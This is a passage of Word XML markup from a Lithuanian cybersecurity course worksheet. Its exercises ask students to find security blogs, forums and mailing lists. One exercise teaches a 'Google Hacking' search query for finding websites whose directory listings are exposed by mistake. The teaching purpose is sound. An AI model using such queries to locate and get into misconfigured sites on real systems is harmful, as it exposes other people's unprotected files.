        </w:rPr>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> interneto naršyklės 1 versiją.</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateik</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> unikalią parsiuntimo nuorodą arba ekrano vaizdą su parsiųsta programa</w:t>
      </w:r>
      <w:r w:rsidR="00F837B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7DD02" w14:textId="3008837B"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 xml:space="preserve">Naudokite paiešką, kad surastumėt </w:t>
      </w:r>
      <w:r w:rsidR="00D1364D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">interneto </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>svetaines, kurios per klaidą</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> visiems</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>suteikia privilegijuotą priėjimą. Nor</w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ė</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tai atklikti eikite į </w:t>
      </w:r>
      <w:hyperlink r:id="rId87">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
          </w:rPr>
          <w:t>http://www.google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir į paieškos langelį įveskite: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allintitle: "index of"</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>pdf</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Paspau</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dę</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nuorodą rezultatuose</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>turėtumėte surasti tokią, kuri atrodo kaip direktorijų sąrašas. Toki</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>paieška</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">žinoma kaip </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>Google Hacking</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> laužimas. Patekite pirmas tris nuorodas iš gautų rezultatų?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E71C1F4" w14:textId="74FA7669"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Suraskite dar tris direktorijų sąrašus, kuriuose yra</w:t>
      </w:r>
      <w:r w:rsidR="00BA26D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:r w:rsidR="00BA26D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> failų ir</w:t>
      </w:r>
      <w:r w:rsidR="00BA26D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mp3</w:t>
      </w:r>
      <w:r w:rsidR="00BA26D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> failų</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateik</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> jų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nuorodas</w:t>
      </w:r>
      <w:r w:rsidR="00F837B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405ADA20" w14:textId="2B561BA7"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Ar yra kitų paieškos pasirinkimų, tokių kaip “</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>allintitle:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“? Kaip juos galite surasti?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012381C4" w14:textId="309DFD2D"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Suraskite ir pateikite daugiau „Google Hacking“ laužimo pavyzdžių.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351F964B" w14:textId="61B397A2"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 xml:space="preserve">Internete suraskite tris </w:t>
      </w:r>
      <w:r w:rsidR="00EA0151" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tinklaraščius (angl. - </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>blog</w:t>
      </w:r>
      <w:r w:rsidR="00EA0151" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>apie kibernetinę saugą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10B245" w14:textId="04D0EECA" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00981107" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Glaustai aprašykite, a</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pie ką rašoma</w:t>
      </w:r>
      <w:r w:rsidR="002337ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinklaraščiuose</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, kuriuos radote 15 užduotyje</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nurodykite</w:t>
      </w:r>
      <w:r w:rsidR="009042DE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="009042DE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įvardinkite konkrečias temas</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pvz. </w:t>
      </w:r>
      <w:r w:rsidR="00EF674E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>programišių (</w:t>
      </w:r>
      <w:r w:rsidR="00542237" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">angl. – </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>ha</w:t>
      </w:r>
      <w:r w:rsidR="00AB62AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>ker</w:t>
      </w:r>
      <w:r w:rsidR="00542237" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, teisėsaugos, akademinė</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir kt.</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F837B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A4522" w14:textId="78CF5804"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 xml:space="preserve">Suraskite tris kibernetinės saugos </w:t>
      </w:r>
      <w:r w:rsidR="00BA4AF5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">diskusijų </w:t>
      </w:r>
      <w:r w:rsidR="00184429" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tinkle vietas – svetaines (angl. – </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>forum</w:t>
      </w:r>
      <w:r w:rsidR="00184429" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D805BD" w14:textId="2E84F624"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Kokiu būdu radote</w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ši</w:t>
      </w:r>
      <w:r w:rsidR="00184429" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00184429" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>diskusijų tinkle vietas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateik</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0019389F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="0019389F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nurodykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>paieškos svetainę</w:t>
      </w:r>
      <w:r w:rsidR="0019389F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="0019389F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, raktinius žodžius</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kt</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F837B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A8651" w14:textId="33D18F96"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 xml:space="preserve">Suraskite dvi svetaines, kurioms priklauso ir </w:t>
      </w:r>
      <w:r w:rsidR="00F26C54" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>diskusijų tinkle vieta</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Ar galite</w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įvardinti rastų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>svetain</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ių</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> temas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196BD59B" w14:textId="0A7BAA92"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 xml:space="preserve">Suraskite bet kokios temos pašto sąrašą (angl. </w:t>
      </w:r>
      <w:r w:rsidR="00F45E0D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>mailing list</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23E877" w14:textId="603B5829"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lastRenderedPageBreak/>
        <w:t>Suraskite tris kibernetinės saugos pašto sąrašus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F869FC1" w14:textId="034E7E1F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00981107" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nustatykite ir į</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vardinkite, kas</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>yra šių sąrašų</w:t>
      </w:r>
      <w:r w:rsidR="0099657D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>savinink</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ai</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78207648" w14:textId="5AFA9EB4"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Kuriuose sąrašuose tikitės rasti labiau</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> objektyviais</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
